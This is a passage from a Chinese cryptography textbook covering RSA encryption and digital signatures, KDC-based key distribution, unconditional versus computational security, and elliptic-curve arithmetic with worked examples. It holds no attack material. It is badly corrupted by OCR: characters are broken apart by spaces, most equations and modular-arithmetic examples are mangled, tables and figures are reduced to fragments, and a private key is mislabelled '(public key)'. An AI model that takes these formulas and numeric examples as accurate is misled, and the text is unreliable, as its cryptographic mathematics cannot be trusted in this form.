。 每 个 用 户 产生 一 对 密 钥 用 于 加 密 和 解密 消息 。 
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图 2-8 RSA 加 密 用 法 


。 每 个 用 户 将 其 中 的 一 个 密 钥 放 入 公共 寄存 器 或 者 其 他 可 访问 的 文件 中 ,这 个 密 钥 就 
是 公 钥 。 该 用 户 把 男 一 个 密 钥 自己 保存 ,这 个 密 钥 就 是 私 钥 。 如 图 2-8 所 示 , 用 户 
A 拥有 从 其 他 人 那里 获得 的 公 钥 的 集合 。 
。 如 果 A 希望 向 B 发 送 一 条 私人 信息 ,那么 A 使 用 B 的 公 钥 加 密 消息 。 
。 当 B 收 到 该 信息 的 时 候 ,B 使 用 B 的 私 钥 解密 信息 。 没 有 其 他 的 接收 者 能 够 解密 消 
息 ,因为 只 有 B 知道 私 钥 。 
在 这 种 方法 中 ,所 有 的 参与 者 都 能 够 访问 公 钥 ,而 私 钥 是 由 每 个 参与 者 在 本 地 产生 , 因 
此 不 需要 分 配 。 只 要 用 户 保护 好 他 的 私 钥 ,接收 的 通信 信息 就 是 安全 的 。 在 任何 时 候 , 用 户 
都 能 够 改变 私 钥 ,并 公布 相应 的 公 钥 值 以 替换 旧 的 公 钥 值 。 
通常 约定 在 对 称 加 密 中 使 用 的 密 钥 为 密 钥 ,而 在 公 钥 加 密 中 使 用 的 两 个 密 钥 分 别 为 公 
钥 和 私 钥 。 
2. 对 称 密 钥 分 发 
由 于 公 钥 加 密 系 统 效率 较 低 ,几乎 不 会 用 于 大 量 数据 的 直接 加 密 ,而 是 经 常用 在 少量 数 
据 的 加 密 上 ,其 最 重要 的 应 用 之 一 就 是 用 于 对 称 密 钥 分 发 ,例如 密 钥 分 发 中 心 (Key 
Distribution Center,KDC) 的 主 密 钥 分 发 。 
对 称 密 钥 交换 主要 用 下 述 两 种 方法 来 生成 密 钥 对 : 
第 一 种 方法 是 密 钥 对 在 客户 端 系统 上 生成 ,然后 公 钥 以 安全 的 方式 传递 给 其 他 用 户 。 
(1) A 产生 公私 钥 对 {PUa,PRa} ,然后 将 A 的 公 钥 PUa 和 身份 信息 IDa 发 给 B。 
(2) B 产生 一 个 会 话 密 钥 K,, 并 用 A 的 公 钥 PUa 加 密 发 给 A。 由 于 只 有 A 的 私 钥 能 
解密 ,因此 A 能 得 到 会 话 密 钥 。 
这 个 方案 很 容易 被 中 间 人 攻击 。 即 有 中 间 人 同时 扮演 B 和 A 的 角色 分 别 与 A 和 B 通 
信 , 从 而 获取 会 话 密 钥 。 根 本 原因 就 是 这 个 方案 缺乏 认证 。 
第 二 种 方法 是 由 一 个 可 信 的 第 三 方 (如 KDC 或 CA 或 CA 的 授权 RA) 生 成 密 钥 对 , 然 
后 以 安全 的 方式 传递 给 用 户 。 该 方案 的 基本 原理 是 密 钥 分 发 中 心 KDC 和 每 个 终端 用 户 都 
共享 一 对 唯一 的 主 密 钥 (用 物理 的 方式 传递 .如 U 盾 )。 终 端 用 户 之 间 每 次 会 话 ,都 要 向 
KDC 申请 唯一 的 会 话 密 钥 ,会 话 密 钥 通 过 与 KDC 共享 的 主 密 钥 加 密 来 完成 传递 。 
(1) A 以 明文 形式 向 KDC 发 送 会 话 密 钥 请 求 包 。 包 括 通话 双方 A、B 的 身份 以 及 该 次 
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传输 的 唯一 标识 nn , 称 为 临时 交互 号 (nonce) 。 临 时 交互 号 可 以 选择 时 间 戳 、 随 机 数 或 者 计 
数 器 等 。KDC 可 根据 临时 交互 号 设计 防 重 放 机 制 。 

(2) KDC 返回 的 信息 包括 两 部 分 。 第 一 部 分 是 A 想 获取 的 信息 ,用 A 的 主 密 钥 Ks 加 
密 , 包 括 通话 密 钥 K, 和 KDC 收 到 的 请 求 包 内 容 以 验证 消息 到 达 KDC 前 是 否 被 修改 或 者 
重 放 过 。 第 二 部 分 是 B 想 获取 的 信息 ,用 也 的 主 密 钥 Ks 加 密 , 包 括 通 话 密 钥 K, 和 A 的 身 
份 。A 收 到 后 这 部 分 消息 便 原样 发 给 B。 

(3) 为 保证 A 发 给 B 的 会 话 密 钥 信息 未 被 重 放 攻 击 ,A、B 使 用 会 话 密 钥 进 行 最 后 的 验 
证 。B 使 用 新 的 会 话 密 钥 K, 加 密 临时 交互 号 ws 并 发 给 A。A 对 ns 进行 一 个 函数 变换 后 ， 
用 会 话 密 钥 发 给 B 验证 。 

在 RSA 密 钥 体制 中 , 当 A 用 户 发 文件 给 B 用 户 时 ,A 用 户 用 B 用 户 公开 的 密 钥 加 密 明 
文 ,B 用 户 则 用 解密 密 钥 解 读 密 文 ,其 特点 如 下 。 

(1) 密 钥 配 发 十 分 方便 ,用 户 的 公用 密 钥 可 以 像 电 话 号 码 短 那样 公开 ,使 用 方便 。 对 网 
络 环境 下 众多 用 户 的 系统 , 密 钥 管理 更 加 简便 ,每 个 用 户 只 需 持 有 一 对 密 钥 就 可 实现 与 网 络 
中 任何 一 个 用 户 的 保密 通信 。 

(2) RSA 加 密 原理 基于 单 向 函数 ,非法 接收 者 利用 公用 密 钥 不 可 能 在 有 限时 间 内 推算 
出 秘密 密 钥 ,这 种 算法 的 保密 性 能 较 好 。 

3. RSA 数字 签名 用 法 


同 加 密 用 法 相反 ,RSA 数字 签名 用 法 的 特征 是 先 私 后 公 : 发 送 方 先 用 自己 的 私 钥 签 名 
(加 密 ) 信 息 发 送 , 实 现 自身 身份 证 明 ,接收 方 接收 后 将 签名 (加 密 ) 信 息 用 发 送 方 公 钥 验证 身 
份 (解密 ) 。 

如 图 2-9 所 示 ,第 三 方 C 得 到 加 密 的 信息 后 ,虽然 可 通过 A 公 钥 得 到 明文 的 消息 ,并 对 
消息 进行 更 改 , 但 是 第 三 方 无 法 得 到 A 私 钥 ,即使 将 更 改 后 的 消息 发 给 B, 但 B 无 法 用 A 公 
钥 进 行 解密 ,从 而 达到 识别 A 身份 (身份 认证 ) 的 效果 。 





Alice 











A 的 私 钥 | 
用 户 A ® 用 户 B 
明文 输入 加 密 解密 明文 输出 


2-9 RSA 签名 用 法 


数字 签名 用 于 发 送 方 身份 认证 和 验证 消息 的 完整 性 ,要 求 具有 唯一 性 \ 不 可 抵赖 、 不 可 
伪造 等 特性 。RSA 的 私 钥 是 仅 有 发 送 方 知道 的 唯一 密 钥 ,具有 唯一 性 ; 使 用 该 密 钥 加 密 消息 
( 即 数 字 签 名 ) ,加 密 者 无 法 抵赖 ,具有 不 可 抵赖 性 ; RSA 加 密 强度 保证 了 私 钥 破 译 计算 不 可 
行 ,因而 难以 伪造 ,从 而 具有 保密 性 。 因 而 RSA 符合 数字 签名 的 要 求 ,能 够 实现 数字 签名 。 
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RSA 在 用 户 确 认 和 实现 数字 签名 方面 优 于 现 有 的 其 他 加 密 机 制 。RSA 数字 签名 是 一 
种 强 有 力 的 认证 鉴别 方式 ,可 保证 接收 方 能 够 判定 发 送 方 的 真实 身份 。 另 外 ,如 果 信 息 离开 
发 送 方 后 发 生变 更 , 它 可 以 确保 这 种 变更 能 被 发 现 。 更 为 重要 的 是 , 当 收 发 方 发 生 争执 时 ， 
数字 签名 提供 了 不 可 抵赖 的 事实 。 

综 上 所 述 ,RSA 的 用 法 可 表示 为 : 

给 定 n= 二 pg,p 和 g 是 大 素数 ,ed mod 亚 (n) 二 1, 公 开 密 钥 为 (n,e) ,秘密 密 钥 为 (n,d)。 

加 密 用 法 : 

公 钥 加 密 mxE€[0,n 一 1],gcd(m,n) 二 1, 则 c==m* mod n 

私 钥 解密 x= 二 c? mod n= 二 (m’ mod nn)" mod n= 二 m” mod n= 二 m 

签名 用 法 : 

私 钥 签名 * 一 ms mod n 

公 钥 验证 m==s* mod n= (m’ mod n)* mod 7 一 7 mod 7 一 7 

【 例 2-19】 给 定 n=55==11X5,W(n)==40, 选 d=11, 则 e=11,m==3,c==3!mod 55 
47, 验 证 : m 二 cmod 55 一 472 mod 55 一 3。 

【 例 2-20】 给 定 "一 65, 立 (一 48, 选 d=5, 则 ee 一 29,m 一 3,s* 一 35 mod 65 一 48, 验 证 ， 
7 一 482mod 65。 

综 上 所 述 : 

(1) 公 钥 密码 学 与 其 他 密码 学 完全 不 同 , 使 用 这 种 方法 的 加 密 系统 ,不 仅 公开 加 解密 算 
法 本 身 , 也 公开 了 加 密 用 的 密 钥 。 

(2) 公 钥 密码 系统 与 只 使 用 一 个 密 钥 的 对 称 传统 密码 不 同 ,算法 是 基于 数学 函数 而 不 
是 基于 替换 和 置换 的 。 

(3) 公 钥 密码 学 是 非 对 称 的 , 它 使 用 两 个 独立 的 密 钥 , 即 密 钥 分 为 公 钥 和 私 钥 ,因此 称 
双 密 钥 体 制 。 双 钥 体 制 的 公 钥 可 以 公开 ,因此 称 为 公 钥 算法 。 算 法 加 密 密 钥 能 够 公开 , 即 陌 
生 者 能 用 加 密 密 钥 加 密 信息 ,但 只 有 用 相应 的 解密 密 钥 才能 解密 信息 。 规 定 加 密 密 钥 叫做 
公开 密 钥 ,解密 密 钥 叫做 私人 密 钥 。 

由 于 算法 的 加 密 与 解密 由 不 同 的 密 钥 完成 ,并 且 从 加 密 密 钥 得 到 解密 密 钥 计算 不 可 行 ， 
所 以 算法 也 称 为 非 对 称 加 密 算法 。 

那么 什么 是 理论 安全 (无 条 件 安全 )? 什么 是 实际 安全 (计算 上 安全 、 计 算 不 可 行 )? 

理论 安全 是 指 攻 击 者 无 论 截获 多 少 密 文 ,都 无 法 得 到 足够 的 信息 来 唯一 地 决定 明文 。 
Shannon 用 理论 证 明 : 欲 达 理 论 安全 ,加 密 密 钥 长 度 必须 大 于 等 于 明文 长 度 , 密 钥 只 用 一 
次 ,用 完 即 丢 , 即 一 次 一 密 (One-time Pad) ,不 具有 实用 价值 。 

实际 安全 是 指 如 果 攻 击 者 拥有 无 限 资 源 ,那么 任何 密码 系统 都 是 可 以 被 破译 的 ; 但 在 
有 限 的 资源 范围 内 ,攻击 者 都 不 能 通过 系统 地 分 析 方 法 来 破解 系统 , 则 称 这 个 系统 是 计算 上 
安全 的 或 破译 这 个 系统 是 计算 上 不 可 行 的 (computationally infeasible) 。 

公 钥 密码 使 用 的 数学 难题 都 是 可 解 的 ,因此 不 具有 理论 安全 性 ; 但 破解 公 钥 密码 计算 
量 巨 大 ,相对 于 现 有 的 计算 机 计算 能 力 而 言 , 计 算 时 间 都 以 年 为 单位 ,不 具有 计算 可 行 性 ,而 
且 可 以 随 着 计算 能 力 的 提高 不 断 增 加 秘 钥 的 长 度 来 进一步 提高 破解 难度 ,因此 公 钥 密码 是 
计算 不 可 行 的 。 

(4) 公 钥 算法 的 出 现 , 给 密码 的 发 展开 辟 了 新 的 方向 。 公 钥 算 法 虽然 已 经 历 了 多 年 的 
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发 展 , 但 仍 具有 强劲 的 发 展 势头 ,在 鉴别 系统 和 密 钥 交 换 等 安全 技术 领域 起 着 关键 的 作用 。 


2.4 椭圆 曲线 密码 


大 多 数 使 用 公 钥 密码 学 进行 加 密 和 数字 签名 的 产品 和 标准 都 使 用 RSA 算法 。 为 了 保 
证 RSA 使 用 的 安全 性 ,最 近 这 些 年 来 密 钥 的 位 数 一 直 在 增加 ,伴随 而 来 的 是 运算 负担 越 来 
越 大 ,这 对 使 用 RSA 的 应 用 是 很 重 的 负担 ,对 进行 大 量 安全 交易 的 电子 商务 更 是 如 此 。 

1985 年 ,Neal Koblitz 和 Victor Miller 将 椭圆 曲线 引入 密码 学 ,提出 了 椭圆 曲线 密码 系 
统 ECC(Elliptic Curves Cryptography, 椭 圆 曲 线 密码 )。ECC 算法 的 优点 在 于 : 

(1) 安全 性 高 。 安 全 性 基于 椭圆 曲线 上 的 离散 对 数 问题 的 困难 性 。 目 前 还 没 找到 解决 
椭圆 曲线 上 离散 对 数 问题 的 亚 指数 时 间 算 法 。 而 大 数 因子 分 解 和 离散 对 数 的 求解 都 存在 亚 
指数 时 间 算 法 。 

(2) 短 密 钥 。 随 着 密 钥 长 度 的 增加 ,求解 椭圆 曲线 上 离散 对 数 问题 的 难度 , 比 同等 长 度 
大 数 因 子 分 解 和 求解 离散 对 数 问题 的 难度 要 大 得 多 。 如 表 2-15 所 示 ,椭圆 曲线 密码 算法 仅 
需要 更 小 的 密 钥 长 度 就 可 以 提供 RSA 相当 的 安全 性 ,因此 可 以 减少 处 理 负荷 。 


表 2-15 ECC 和 RSA 对 比 


























ECC 密 钥 尺寸 (bit) 106 132 160 220 600 

RSA 密 钥 尺寸 (bit) 512 768 1024 2048 21000 

破解 时 间 (MIPS 年 ) 104 108 1011 1020 1078 
ECC/RSA 密 钥 尺寸 比例 和 1:6 六 1:10 1:35 


(3) 灵活 性 好 。 可 以 改变 曲线 的 参数 得 到 不 同 的 曲线 ,形成 不 同 的 循环 群 ,构造 密码 算 
法 具有 多 选择 性 。 

因此 ECC 和 RSA 相 比 ,在 许多 方面 都 有 绝对 的 优势 ,主要 体现 在 以 下 方面 : 

(1) 抗 攻击 性 强 。 相 同 的 密 钥 长 度 , 其 抗 攻击 性 要 强 很 多 倍 。 

(2) 计算 量 小 ,处 理 速度 快 。ECC 总 的 速度 比 RSA、DSA 要 快 得 多 。 

(3) 存储 空间 占用 小 。ECC 的 密 钥 尺寸 和 系统 参数 与 RSA、DSA 相 比 要 小 得 多 ,意味 
着 它 所 占 的 存储 空间 要 小 得 多 。 这 对 于 加 密 算法 在 IC 卡 上 的 应 用 具有 特别 重要 的 意义 。 

(4) 带宽 要 求 低 。 当 对 长 消息 进行 加 解密 时 ,两 类 密码 系统 有 相同 的 带宽 要 求 ,但 应 用 于 
短 消息 时 ECC 带宽 要 求 却 低 得 多 。 带 宽 要 求 低 使 ECC 在 无 线 网 络 领域 具有 广泛 的 应 用 
前 景 。 

ECC 应 用 方面 已 被 IEEE 公 钥 密码 标准 采用 。 它 既 可 以 加 密 又 可 以 实现 数字 签名 , 便 
于 软 硬 件 实现 , 密 钥 生 成 速度 快 ,特别 适合 于 对 计算 能 力 要 求 不 高 的 系统 ,如 智能 卡 、 手 机 。 


2.4.1 实数 域 上 的 椭圆 曲线 


密码 学 中 的 椭圆 曲线 绘 出 的 图 像 并 非 椭圆 ,之 所 以 称 为 椭圆 曲线 是 因为 曲线 方程 与 计 
算 椭圆 周 长 的 方程 相似 ,也 是 用 三 次 方程 来 表示 的 。 
一 般 形 式 的 椭圆 曲线 三 次 方程 是 一 个 具有 两 个 变量 x 和 > 的 魏 尔 斯 特 拉 斯 方程 : y 十 
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azy 十 by 二 zx 十 cx’: 十 dx 十 e, 其 中 4a.b、c.d、e 是 实数 ,zx 和 >y 在 实数 集 上 取 值 。 

密码 中 普遍 采用 实数 域 上 的 椭圆 曲线 ,实数 域 上 的 椭圆 曲线 是 指 曲线 方程 定义 中 ,所 有 
系数 都 是 某 一 实数 域 GF(p) 中 的 元 素 ( 其 中 p 为 大 于 3 的 素数 )。 

常用 椭圆 曲线 形式 是 : 

y =z +ar+b(a,b € GF(p) ,da’ + 27b #0) 

常用 椭圆 曲线 由 上 述 方程 确定 的 所 有 点 (zx，y) 的 集合 ,加 一 个 无 穷 远 点 O( 认 为 其 y 坐 
标 无 穷 大 ) 所 定义 。 给 定 a 和 2 ,常用 椭圆 曲线 用 集合 E(a, 5) 表 示 。 

对 xz 的 每 一 个 值 ,y= 土 Vx 十 ar 十 6 , 即 y 都 有 一 个 正 值 和 负 值 ,这 样 每 一 曲线 都 关于 
3 二 0 对 称 , 如 图 2-10 所 示 。 








图 2-10 y 三 wx 


需要 提醒 大 家 注意 的 是 ,一 般 椭圆 曲线 不 一 定 关于 z 轴 对 称 ,例如 yx 一 zy 二 zx 十 1 对 
应 的 图 像 椭 圆 曲 线 就 不 关于 x 轴 对 称 。 

实数 域 上 椭圆 曲线 的 加 法 运算 

椭圆 曲线 的 参数 a 和 2 ,如果 满 足 条 件 : 4a 十 27? 关 0, 则 可 基于 集合 El(a, 5) 定 义 一 
个 群 。 该 群 按 以 下 加 法 运算 规则 构成 阿 贝 尔 群 如 果 椭 圆 曲 线 上 的 3 个 点 A、B\C 在 同一 
直线 上 , 则 它们 的 和 等 于 零 元 0, 即 A 十 B 十 C 一 O。 

定义 无 穷 远 点 是 加 法 零 元 O。 由 弦 切 法 可 以 定义 椭圆 曲线 加 法 的 运算 规则 ; 

(1) O 为 加 法 零 元 (单位 元 ) , 即 对 椭圆 曲线 上 任 一 点 也 .有 P+O = P; 

(2) 设 Pi 二 (x, y) 是 椭圆 曲线 上 的 一 点 ,其 加 法 逆 元 P= 一 P 一 (zx, 一 y); 

(3) 设 QP 是 椭圆 曲线 上 的 两 点 ,它们 相 加 后 的 点 是 Q 和 PP 的 连 线 与 椭圆 曲线 的 交点 
的 加 法 逆 元 。 设 交点 是 尺 , 由 QT+TP+R= 0, 得 Q+P= 一 R; 

使 用 弦 切 法 的 做 法 是 : 任意 取 椭 圆 曲 线 上 两 点 P,Q ( 若 P,Q 两 点 重合 , 则 做 已 点 的 切 
线 ) ,过 两 点 做 直线 交 于 椭圆 曲线 的 另 一 点 R’ ,过 R’ 做 y 轴 的 平行 线 交 于 尺 , 规 定 P 十 Q==R。 

(4) 尸 的 倍 点 是 已 点 所 做 的 椭圆 曲线 的 切线 与 椭圆 曲线 的 交点 的 加 法 逆 元 。 设 交点 是 
S, 定 义 2P ==P 十 P= 一 S$。 类 似 地 ,可 定义 3P = 二 2P 十 P 等 。 

(5) 若 存在 最 小 正 整数 ”使 得 zP=OCPEE(Ce, 5)), 则 为 椭圆 曲线 天 上 点 P 的 阶 。 


第 2 章 密码 学 基础 61 





以 上 运算 规则 的 几何 意义 是 : 

(1) 无 穷 远 点 O 的 坐标 无 穷 大 ,为 一 虚拟 的 点 ,在 图 像 上 无 法 显示 。 

(2) 一 条 与 工 轴 垂直 的 直线 和 曲线 相交 于 两 个 点 P, 和 P; ,这 两 个 点 的 z 坐标 相同 , 即 
Pi 二 (zx, y) 和 Ps 二 (x, 一 y), 同 时 它 也 与 曲线 相交 于 无 穷 远 点 O, 因 此 P= 二 一 P1。 故 PP 
与 其 逆 元 一 P 成 对 出 现在 椭圆 曲线 上 ; 求 一 点 的 北 元 方法 是 过 该 点 做 y 轴 的 平行 线 , 其 与 
椭圆 曲线 的 另 一 交点 即 为 逆 元 。 

(3) 横 坐 标 不 同 的 两 个 点 Q 和 尸 相 加 , 先 在 两 点 之 间 画 一 条 直线 并 求 直 线 与 椭圆 曲线 的 
第 三 个 交点 R’ ,然后 过 R’ 做 > 轴 的 平行 线 交 于 RR, 则 R 为 两 个 点 Q 和 己 的 和 , 即 P 二 Q=R。 

(4) 两 个 相同 的 点 已 相 加 ,通过 该 点 画 一 条 切线 ,切线 与 椭圆 曲线 相交 于 另 一 点 尽 ”, 然 
后 过 R’ 做 > 轴 的 平行 线 交 于 R, 则 R 为 2P 点 , 即 2P=R。 

【 例 2-21】 求 椭圆 曲线 E( 一 10, 15): y= 二 x; 一 10zx 十 15 上 点 P( 一 3.23，3. 70) 和 
Q(3.45, 4.66) 的 和 。 

(1) 如 图 2-11 所 示 ,选择 点 P( 一 3.23, 3.70) 和 点 Q(3. 45, 4. 66) 。 

(2) 根据 加 法 规则 , 设 通过 点 已 和 Q 的 直线 与 椭圆 曲线 相交 于 点 一 RR, 一 R 是 点 R 关于 
工 轴 的 镜像 。 尺 就 是 点 P 和 Q 的 和 ,如 图 2-11 所 示 点 R=( 一 0.21, 4.13) 。 








图 2-11 y=xw 10x+15 P+Q=R 








【 例 2-22】 求 椭圆 曲线 EE( 一 10, 15): y= 二 zz 一 10z 十 15 上 点 P( 一 1.27, 5.07) 的 2 倍 
点 和 3 倍 点 。 

(1) 如 图 2-12 所 示 , 选 定 椭圆 曲线 上 一 点 P( 一 1.27, 5.07) 。 

(2) 根据 加 法 规则 , 设 点 了 的 切线 与 椭圆 曲线 交 于 点 一 R, 一 R 是 点 R 关于 xz 轴 的 镜 
像 。R 点 就 是 点 P 的 2 售 。 如 图 2-12 所 示 ,2 售 点 R=2P=(2. 80, 一 3.00)。 

(3) 根据 加 法 规则 , 设 点 2P 的 切线 与 椭圆 曲线 交 于 点 一 R, 一 R 是 点 R 关于 xz 轴 的 镜 
像 。 尺 点 就 是 点 尸 的 3 倍 。 如 图 2-13 所 示 ,3 信和 点 R=2P 十 P==(2.39, 2.17)。 


2.4.2 有 限 域 上 的 椭圆 曲线 
由 方程 mod p 二 (zx? 十 ar 十 6) mod p 定义 的 椭圆 曲线 , 若 方 程 的 变 元 和 系数 均 为 有 
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限 域 F, 中 的 元 素 ( 其 中 p 为 素数 ), 即 xz、y、a、bE F ,运算 为 模 p 运算 , 则 该 椭圆 曲线 为 有 
限 域 ,上 的 椭圆 曲线 。 

















图 2-12 2 们 点 图 2-13 3 信 点 


所 有 满足 上 述 方程 的 整数 对 (x，y) 和 无 穷 远 点 O 组 成 的 集合 E, Ca, 5) 即 有 限 域 上 FF， 
的 椭圆 曲线 。 类 似 实数 域 上 的 椭圆 曲线 ,有 限 域 F, 上 的 椭圆 曲线 关于 > 一 2/2 对 称 。 
图 2-14 给 出 了 有 限 域 Fs 椭圆 曲线 Ess(11, 20) 的 可 视 化 结果 。 从 图 中 可 以 看 出 ,椭圆 
曲线 分 别 关 于 > 一 11.5 对 称 。 
【 例 2-23】 求 有 限 域 Fs 椭圆 曲线 Ess(11, 20): y* 三 zx? 十 11zx 十 20 第 一 象限 整数 点 的 
集合 。 
解 : .xz 一 0,. (zs 十 11z 十 20) mod 23==20 。 y mod 23 三 1 
“… yy 依次 取 正 整数 1,2,3,… ,23, 试 算 : 
y=1,y’ mod 23 三 1; y 一 2,y mod 23=4; y 一 3,y mod 23=9; 
y 一 4,y mod 23 三 16; y=5,y’ mod 23 三 25 mod 23=2; …; 
y 一 22,y mod 23 寺 484 mod 23 夺 1; y 一 23 时 ,y= 二 p, 本 次 试 算 结束 。 
… 无 满足 条 件 的 解 。 
“X=1,.. (x 二 +1llz+20) mod 23=9 .. y: mod 23=9 
“… yy 依次 取 正 整数 1,2,3,…,23, 试 算 : 
y=1,y: mod 23=]1; y 一 2,y mod 23=4; y=3,y’ mod 23=9; 
y=4,y: mod 23 三 16; y=5,y’ mod 23 二 25 mod 23=2; …; 
y 一 22,y mod 23 寺 484 mod 23 寺 1; y 二 23 时 ,y= 二 p, 本 次 试 算 结 束 。 




















“Y=3,y:=20。 
类 似 地 ,使 用 表 2-16 可 得 其 他 运算 结果 。 当 z= 二 23 时 ,zx 二 p, 本 题 运 算 结 束 。 所 以 方 
程 在 第 一 象限 整数 点 的 集合 为 表 2-17 中 的 27 个 点 加 上 无 穷 点 O, 共 28 个 点 。 具 体 的 可 视 
化 结果 见 图 2-14。 
根据 计算 结果 可 知 , 椭 圆 曲 线 中 y>z 的 对 应 关系 是 1 对 nn 的 关系 ,如 > 一 16,z 一 6、7、 
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10, 因 此 根据 y 不 能 具体 确定 z, 这 就 是 椭圆 曲线 能 够 用 于 密码 学 的 原因 。 
表 2-16 炎 二 “十 11x 十 20 试 算 
工 (zx 十 z 十 1) y (yy ys Cy2)? 
1 32 一 23 十 9 3 9 20 400 一 391 十 9 
2 50 一 23X2 十 4 2 4 21 441 一 437 十 4 
4 128 一 23X5 十 13 6 36 一 23 十 13 17 289 一 23X12 十 13 
5 200 一 23X8 十 16 4 16 19 361 一 345 十 16 
6 302 一 23X13 十 3 而 49 一 46 十 3 16 256 一 23X11 十 3 
了 440 二 23X19 十 3 7 16 
10 1130 一 23X49 十 3 7 16 
本 1472 一 23X 64 0 0 
15 3560 一 23X154 十 18 8 64 一 46 十 18 15 225 一 23X9 十 18 
18 6050 王 23X263 十 1 1 1 22 484 二 23X21 十 1 
19 7088 二 23X308 十 4 2 2 
20 8240 一 23X358 十 6 11 121 王 115 十 6 12 144 一 23X6 十 6 
21 9512 一 23X413 十 13 6 到 
22 10910 一 23X474 十 8 10 100 一 92 十 8 13 169 一 23X7 十 8 
表 2-17 〈x,y) 值 
第 一 象限 点 集 
C3y (1,20) (0,0) 
(2,2) (2,21) (15,8) (15,15) 
(4,6) (4,17) (18,1) (18,22) 
(5,4) (5,19) (19,2) (19,21) 
(6,7) (6,16) (20,11) (20,12) 
RE (7,16) (21,6) (21,17) 
(10,7) (10,16) (22,10) (22,13) 
有 限 域 F, 上 椭圆 曲线 的 加 法 运算 


椭圆 曲线 的 参数 a 和 65, 如 果 满 足 条 件 : 4a’ 十 275? (mod p) 关 0, 则 可 基于 集合 E, (a, 5) 
定义 一 个 有 限 阿 贝尔 群 。E, (a, 5) 上 的 加 法 运算 构造 与 定义 在 实数 域 上 的 椭圆 曲线 中 描述 


的 代数 方法 是 一 致 的 。 对 任何 点 P,QE 下, ,加 法 运算 的 代数 捅 述 如 下 : 


(1) 0 为 加 法 单位 元 ,P 十 O=P; 
(2) 若 P=(z, y),(z, 一 y) 是 P 的 加 法 逆 元 ,表示 为 一 P。 一 P 也 是 E,(a,5) 中 的 点 。 


(3) 车 P=(zi,y1),Q= (xz,y2),P 





Q, 则 P 十 Q 二 (xs，ys) 按 以 下 规则 确定 : 


ZsX—x1— zx (mod 思 ) ,ys 三 1Czi 一 zs) 一 mod p), 


(p20) 
2 
3zx? 二 a 


B= 
2 (P=Q) 


用 E,(a,5) 表 示 方 程 所 定义 的 椭圆 曲线 上 的 整数 点 集 , 由 点 集合 {(z,y): 0<zx<p， 
0 三 yp,z、y 为 正 整 数 } 并 上 无 穷 点 O 所 得 。 
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(4) 乘法 定义 为 重复 相 加 。 如 4P=P+P+P+P. 个 相同 的 点 已 相 加 , 记 作 &P, 称 
为 下 倍 点 ,表示 为 : Q 二 kP, 其 中 QP 为 E,(a,5) 上 的 点 ,k 为 小 于 n(n 是 点 P 的 阶 ) 的 整 
数 , 说 明 &P 仍然 是 椭圆 曲线 上 的 某 一 点 。 

信和 点 运算 是 指 : 给 定 一 点 已 和 一 个 整数 & ,计算 kP, 即 个 P 点 的 和 。 不 难 发 现 ,给 
定 上 和 尸 ,根据 加 法 法 则 ,计算 Q 很 容易 ; 但 给 定 和 Q, 求 上 就 相对 困难 了 。 

这 就 是 椭圆 曲线 加 密 算法 采用 的 数学 难题 一 一 椭圆 曲线 离散 对 数 (ECDLP) 问 题 。 我 
们 把 点 已 称 为 基点 (base point) ,k(k 二 n,n 为 基点 P 的 阶 ) 称 为 私有 密 钥 (public key),K 称 
为 公开 密 钥 (public key) 。 

椭圆 曲线 上 的 离散 对 数 问 题 表示 为 : 给 定点 P 和 AP ,计算 整数 &k。 椭 圆 曲 线 密码 体制 
的 安全 性 便 建立 在 椭圆 曲线 离散 对 数 问题 之 上 。 

【 例 2-24】 求 椭圆 曲线 Es (11, 20): = 如 十 11z 十 20 上 点 P(7, 16) 和 点 Q(15, 8) 




















之 和 。 
解 : …P(7,， 16),Q(15, 8),P 关 Q 
让 A es 对 1 mod 23 一 22,zs 一 (22): 一 7 一 15 一 462 mod 23=2, ys =22(7—2) 














16 王 94 mod 23 三 2,P 十 Q 二 (2,2) ,如 图 2-14 所 示 。 


0+11x+20 在 Fy3 上 有 28 个 点 。 








业 . . 
20T 。 
+ . 
二 . . 
+ oe . 
15 十 . 
+ . 
. 
十 . 
10 十 日 
1 0, 
十 ee 
+ . © 
5 十 
十 . 
. 
R 
十 . . 
+ 一 个 二 一 1 4 
0 5 10 15 20 


图 2-14 计算 点 P 和 0 的 和 


【 例 2-25】 求 椭圆 曲线 Es(11, 20): y= 二 zx? 十 11x 十 20 上 点 P(7, 16) 的 2 倍 点 。 
解 : …P(7, 16),P 一 Q 


。 3X7? 十 11_158 2 人 
“A 2X16 32 mod 23 王 15，zs 一 (15) 一 7 一 7 二 211 mod 23=4,y;= 


15(7 一 4) 一 16 一 29 mod 23 寺 6,2P 一 (4,6) ,如 图 2-15 所 示 。 
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zo Y 
op 4 

15 十 。 

io [ 
Ha | 
和 十 - 

[ 二 一 + + tt | + 一 

0 > 10 15 20 

图 2-15 计算 2P 
解 题 指导 : 分 数 (除法 ) 取 模 运 算 需 要 转换 为 乘法 取 模 运算 。 


难点 是 如 何 求 一 了 mod 23。 


“4 一 如 mod 23 .79 mod 23 二 16X mod 23,10 一 16A mod 23, 取 4 二 1,2,… ,23 试 算 ， 
可 得 4 二 15 时 等 式 成 立 。.….4 二 15。 
【 例 2-26】 已 知 Ei(1,6) 上 一 点 PC(2.,7). 求 nn 售 和 点 nP 的 所 有 值 。 


3 3 
解 : 2P= (zs,ys)， 和 oe 14 8 mod 11， 
zs=64—2—2=60=5 mod 11， ys=8X(2—5)—7=2 mod 11,2P 一 (5,2) 
3P 一 P 十 2P 一 (2,7) 十 (5,2)， 1 一 普 一 郊 一 一 三 一 2 mod 11 
ek | 3 

Zs=4—2—5=—3==8 mod 11， ys=2X(2—8)—7=3 mod 11,3P 一 (8,3) 

2 
4P 一 2P 十 2P 一 (5,2) 十 (5,2)， 一切 卫 < 一 19 一 8 mod 11 

| 


Xs==64 一 5 一 5 二 54 夺 10 mod 11， ys 二 8X(5—10) 一 2 三 2 mod 11,4P=(10,2) 
5P=P+4P=(3,6), 6P=P+5P=(7,9), 7P=P+6P=(7,2) 
Sxt Fa 301 
2y1 4 
zs=1—10—10=—19=3 mod 11， y=1X(10—3)—2=5 mod 11,8P 一 (3,5) 
9P=P+8P=(10,9),10P=P+9P=(8,8), 11P=P+10P=(5,9) 


12P=8P+4P=(3,5) 十 (10,2)， 4 二 尖 一 和 ~ 一 3~g mod 11 


Ti— 2 








oo 
名 
| 
下 


H4P=(10,2) 二 (10,2)=(3,5), 和 1 mod 11 
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zs=81—3—10=68=2 mod 11， ys=9X(3—2)—5=4=4 mod 11,12P=(2,4) 
13P=P+12P 一 (2,7) 十 (2,4) 一 (0,0), 此 时 4 一 7 一 忆 - 趋 向 于 无 穷 ,表示 无 穷 远 

